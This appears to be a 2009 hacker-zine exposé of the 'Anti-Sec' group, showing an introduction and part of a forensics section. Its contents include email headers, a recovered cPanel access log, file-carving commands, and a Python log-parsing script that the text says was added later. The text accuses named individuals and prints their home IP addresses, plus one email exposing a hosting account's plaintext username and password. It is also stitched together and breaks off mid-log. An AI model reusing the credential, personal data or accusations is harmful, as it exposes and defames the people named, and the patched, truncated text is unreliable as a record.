[ASCII art banner]

*no more*

get yours http://www.network-science.de/ascii/

[0x00] [Introduction]
[0x01] [Forensics]
[0x02] [Target Profiling & Lulz]
[0x03] [ownage.net - prosec]
[0x04] [vitalspeeds - prosec]
[0x05] [makosolutions - prosec]
[0x06] [holeinthewallhosting - prosec]
[0x07] [darkmindz - zf05]
[0x08] [Backdoor RCE]
[0x09] [SEO Optimizing]
[0x10] [Reporting]
[0x11] [Attachments]
[0x12] [Conclusion]
[0x13] [Greetz]

[0x00] [Introduction]

hai:]

What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known as "ProSec" contacted us with reports containing information about the entire group and how it was operating. We don't know who they are; they appear to be well-funded, top-notch security experts, and what they have done against the group is invaluable to us and to others who have been or would have been targeted.

ProSec did want me to convey a message: organizations similar to Anti-Sec will be, and currently are being, targeted by the movement. ProSec already has access to a number of them, is continuously monitoring and gathering more information about the various groups, and will release information when applicable. No longer should whitehats fear these groups: as soon as an individual is targeted, they will target right back. This is a warning shot to those out there that target us.
I want to thank ProSec for the work that they continue to do and understand why this movement is so important to the security community.

On the 4th of June 2009, a group named "Anti-Sec" decided to expose the Astalavista group after they successfully exploited what was rumored to be a Litespeed 0day exploit, which in reality does not exist. After looking into this more and more, a couple of days later we found out that the person responsible for this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators, decided to warn his friend RoMeO about it and, as you will notice below, Joao Pontes (rorkty) knew from the beginning that the Astalavista group was compromised by his closest friend and decided to do nothing about it.

Later, on the 9th of June, one of my dedicated hosting servers, running a couple of websites, was targeted by the same "Anti-Sec" group, providing fake and misleading information to the public.

The reason that we decided to start looking into this subject was to see how and why my dedicated hosting server was compromised despite the fact that it was secure enough to provide access to the outside world. Below is a list of some security measures that had been taken to ensure that no unauthorized access was permitted:

1) Firewall Protection
2) Brute Force Detection and Prevention
3) Kernel Hardening
4) Apache, PHP, SQL Hardening
5) SSH Hardening
6) Wheel access group for su
7) Chrooted Jail Shell
8) Web Application Firewall
9) Network Intrusion Detection
10) Host Intrusion Detection
11) Hidden daemon versions
12) Rootkit Detection
13) DoS Protection
14) All private sites hosted, audited for bugs
15) Root Access Alert
16) Etc

Unfortunately, the interval between the compromise of the server and the alert reports coming to our attention was not enough to prevent the attack.
After our research and the information provided by the ProSec group, we came to the conclusion that the server was hit either by an 0day exploit or through my dedicated server provider makosolutions.com, which, as shown later on, was backdoored.

Utilizing passive and active reconnaissance methods resulted in large information acquisitions, which provided us with the means to link together certain information and shed more light on who we are about to target and research for the attacks that took place under the "Anti-Sec" label.

In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities.

[0x01] [Forensics]

Email Incidents

Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs268734fao; Tue, 9 Jun 2009 03:58:03 -0700 (PDT)
Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200; Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Return-Path:
Received: from freehostia.com ([66.40.52.21]) by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02; Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21;
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com
Received: from root by freehostia.com with local (Exim 4.63) (envelope-from ) id 1MDz3p-0002ME-UX for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000
To: glafkos@gmail.com
Subject: Hosting account: Password reminder
MIME-Version: 1.0
Content-type: text/plain; charset=UTF-8
From: Free Hostia
Cc:
Reply-To:
Message-Id:
Date: Tue, 09 Jun 2009 11:00:09 +0000

Dear Glask Chwat,

at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel. We are sending you your account login details:

username: glachw
password: 1779586

If you have any questions, please open a new support ticket from the Help section of the Control Panel.

Best Regards,
Free Hostia Team

/* Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor? As you can see above, he made this request from his home IP. */

Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs272895fao; Tue, 9 Jun 2009 05:26:34 -0700 (PDT)
MIME-Version: 1.0
Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue, 09 Jun 2009 05:26:34 -0700 (PDT)
Date: Tue, 9 Jun 2009 15:26:34 +0300
Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com>
Subject: Lol.
From: james knuth
To: glafkos@gmail.com
Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868

http://pastebin.com/m592e1f1c

It will be all over the net soon, Enjoy.

// Indeed..

Server Forensics

root@srv01 [/home/recovery]# du -h --max-depth=1
608K    ./APF_Backup
992K    ./Diff
224K    ./Latest
3.3M    ./LinkNet
46M     ./log
1.2M    ./modbin
7.5G    ./sdb2recover
361M    ./sdb3recover
371M    ./sdb5recover
121M    ./Software
128K    ./OpenSSH_Debug
4.5G    ./Evidence
15G     .
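
The session that follows carves a deleted cPanel access_log out of the disk with fls and icat and then greps it by hand for one address range. As an added example (not part of the original write-up), this Python code reduces a log in that layout to a per-address login timeline; the function names, sample lines, addresses and host name are constructed, and it assumes month/day/year dates and that a lone number after the request is the byte count with no status logged.

```python
import re
from datetime import datetime

# Layout seen in the recovered log: ip ident user [MM/DD/YYYY:HH:MM:SS zone]
# "request", then "status size" or one lone number, then "referer" "agent".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) '
    r'\[(?P<ts>\d{2}/\d{2}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?:(?P<status>\d{3}) )?(?P<size>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
STATIC_RE = re.compile(r'\.(?:css|js|gif|jpe?g|png|ico)$', re.IGNORECASE)
POLLING = {"/xml-api/loadavg"}  # periodic status refresh, not an operator action

UA = "Mozilla/5.0 (constructed)"
# Constructed sample: documentation addresses, made-up host, last line truncated
# the way a carved file often is.
SAMPLE_LOG = f'''\
203.0.113.45 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "{UA}"
203.0.113.45 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://panel.example.test:2096/" "{UA}"
203.0.113.45 - user@example.test [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://panel.example.test:2096/" "{UA}"
203.0.113.45 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://panel.example.test:2087/" "{UA}"
203.0.113.45 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://panel.example.test:2087/" "{UA}"
203.0.113.45 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_0000000000/themes/x/logo.jpg HTTP/1.1" 200 0 "https://panel.example.test:2087/" "{UA}"
203.0.113.45 - root [06/08/2009:13:19:37 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://panel.example.test:2087/scripts/command" "{UA}"
203.0.113.45 - root [06/08/2009:13:19:46 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://panel.example.test:2087/scripts/command" "{UA}"
203.0.113.45 - root [06/08/2009:13:22:52 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://panel.example.test:2087/scripts/command" "{UA}"
203.0.113.45 - root [06/08/2009:13:23:11 -0000] "GET /scripts2/sshkeys HTTP/1.1" 0 "https://panel.example.test:2087/scripts2/securitycenter" "{UA}"
198.51.100.7 - - [06/08/2009:13:25:00 -0000] "GET / HTTP/1.1" 401 0 "" "{UA}"
203.0.113.45 - root [06/08/2009:13:23
'''


def parse_line(line):
    """Return one log entry as a dict, or None when the line does not fit the layout."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    e = m.groupdict()
    # Assumption: month/day/year order; swap %m and %d if the panel logs day first.
    e["time"] = datetime.strptime(e["ts"], "%m/%d/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"]) if e["status"] else None  # None: lone-number form
    e["size"] = int(e["size"])
    return e


def is_noise(entry):
    """Static assets and refresh polling say nothing about what the operator did."""
    path = entry["path"].split("?", 1)[0]
    return bool(STATIC_RE.search(path)) or path in POLLING


def build_timeline(text):
    """Group entries by client address; keep failed logins, first login, actions."""
    report, rejected = {}, []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        e = parse_line(raw)
        if e is None:
            rejected.append(raw)  # keep damaged lines for manual review
            continue
        r = report.setdefault(
            e["ip"], {"failed_logins": [], "first_auth": None, "actions": []})
        if e["user"] != "-" and e["status"] == 401:
            r["failed_logins"].append((e["time"], e["user"]))
        elif e["user"] != "-":
            if r["first_auth"] is None:
                r["first_auth"] = (e["time"], e["user"])
            if not is_noise(e):
                r["actions"].append((e["time"], e["user"], e["path"]))
    return report, rejected


def format_report(report):
    """Render the per-address findings as plain text lines."""
    out = []
    for ip, r in sorted(report.items()):
        out.append(ip)
        for t, user in r["failed_logins"]:
            out.append(f"  {t.isoformat()} failed login as {user}")
        if r["first_auth"]:
            t, user = r["first_auth"]
            out.append(f"  {t.isoformat()} first authenticated request as {user}")
        for t, user, path in r["actions"]:
            out.append(f"  {t.isoformat()} {user} {path}")
    return out


if __name__ == "__main__":
    findings, damaged = build_timeline(SAMPLE_LOG)
    print("\n".join(format_report(findings)))
    print(f"{len(damaged)} line(s) did not parse")
```
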
root@srv01 [/home/recovery]#

// Obviously this noobcake didn't know that it was possible to recover deleted files

root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string*
416K    sdb2output.txt
7.5G    sdb2recover
361M    sdb3recover
7.9M    sdb3usrdirlist.txt
371M    sdb5recover
22M     sdb5tmp.txt
64K     sdb8deleted_files.txt
2.5M    sdb8home.txt
857M    stringfile_sdb2.txt
root@srv01 [/home/recovery]#

root@srv01 [/home/recovery]# ls -lad sd*recover
drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover
drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover
drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover
root@srv01 [/home/recovery]#

root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt
root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt
r/r 2195490: local/cpanel/logs/access_log
r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync
r/r 2362208: local/apache/logs/access_log
root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log
root@srv01 [/home/recovery]# ls -la /tmp/access_log
-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log
root@srv01 [/home/recovery]#

// Someone needs to learn how to cover his tracks... try...
"man dd" root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54 188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 
"https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET 
/unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 
-0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 
"https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 
rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root 
[06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 
"https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 